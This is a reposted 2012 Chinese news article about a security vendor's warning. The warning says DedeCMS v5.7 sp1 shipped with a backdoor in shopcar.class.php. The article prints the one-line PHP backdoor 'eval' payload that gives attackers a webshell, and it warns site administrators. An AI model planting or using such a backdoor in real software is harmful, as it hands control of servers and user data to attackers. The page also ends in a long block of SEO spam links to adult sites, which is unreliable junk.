瑞星:織夢CMS系統現后門70萬網站資料恐不保

作者: 來源:未知 2012-03-22 11:23:36 閱讀 我要評論 直達商品

騰訊科技訊 3月22日消息,瑞星公司今日對外發布緊急警示:國內知名的PHP開源網站管理系統——織夢CMS(DedeCms)v5.7 sp1版本被發現植入后門,黑客可通過此后門直接獲得網站的控制權限,獲取存儲在服務器上的文件和數據庫。

據CMS官方數據顯示,目前約有70萬網站使用該系統搭建,涉及企業、政府機關、媒體機構、行業及個人網站等。瑞星公司特此緊急提醒使用該系統的網站管理員,使用瑞星網站密碼安全檢測系統查找后門并及時進行封堵。

據瑞星專家介紹,織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過利用這個后門,黑客只需要構造簡單的數據包提交到服務器,就能夠獲取到該網站的WebShell,通過對服務器進一步滲透攻擊,進而獲取服務器的最高權限。

在黑客攻陷網站后,便可以直接訪問服務器上的文件、數據庫等信息。目前我國有大量網站采用該系統,此后門或將導致大量用戶的信息泄露,造成極為嚴重的影響。


  推薦閱讀

  全新酷狗電臺 邂逅音樂精彩

隨著Pandora網絡電臺在國外掀起一陣新的聽電臺熱潮,國內領先的數字音樂廠商酷狗音樂亦推出了其電臺產品, 基于酷狗龐大的音樂曲庫,結合人工多維度地細致分類,通過收集用戶行為進行算法優化等推薦方法向用戶提供優>>>詳細閱讀


本文標題:瑞星:織夢CMS系統現后門70萬網站資料恐不保

地址:http://m.sdlzkt.com/a/kandian/20120322/43160.html

樂購科技部分新聞及文章轉載自互聯網,供讀者交流和學習,若有涉及作者版權等問題請及時與我們聯系,以便更正、刪除或按規定辦理。感謝所有提供資訊的網站,歡迎各類媒體與樂購科技進行文章共享合作。

網友點評
我的評論: 人參與評論
驗證碼: 匿名回答
網友評論(點擊查看更多條評論)
友情提示: 登錄后發表評論,可以直接從評論中的用戶名進入您的個人空間,讓更多網友認識您。
自媒體專欄

評論

熱度

主站蜘蛛池模板: 成人欧美一区二区三区的电影| 国产成人无码av片在线观看不卡| 成人免费福利电影| 国产精品成人久久久久久久| 国产成人免费网站app下载| 国产69久久精品成人看小说| 青青国产成人久久91网站站| 国产成人精品午夜二三区 | 国产成人综合日韩精品无码| 亚洲国产成人片在线观看| 成人午夜精品无码区久久| 久久成人a毛片免费观看网站| 成人一级片在线观看| 欧美成人国产精品高潮| 四虎影视成人永久在线播放| 成人年无码av片在线观看| 97色婷婷成人综合在线观看| 亚洲国产精品成人久久久| 国产成人精品男人免费| 成人精品一区久久久久| 青青草国产成人久久91网| 四虎国产成人永久精品免费| 国产成人精品一区二三区| 成人欧美一区二区三区黑人3p| 久久精品国产成人AV| 亚洲精品成人久久| 免费成人福利视频| 国产成人A∨激情视频厨房| 国产成人综合美国十次| 成人一a毛片免费视频| 国产精品成人网| 国产成人a毛片在线| 免费特级黄毛片在线成人观看| 亚洲国产精品成人精品无码区在线 | a级成人毛片免费视频高清| 四虎影视永久地址www成人| 国产成人精品1024在线| 国产成人v爽在线免播放观看| 国产成人无码精品久久二区三区| 国产成人av三级在线观看| 四虎成人精品在永久免费|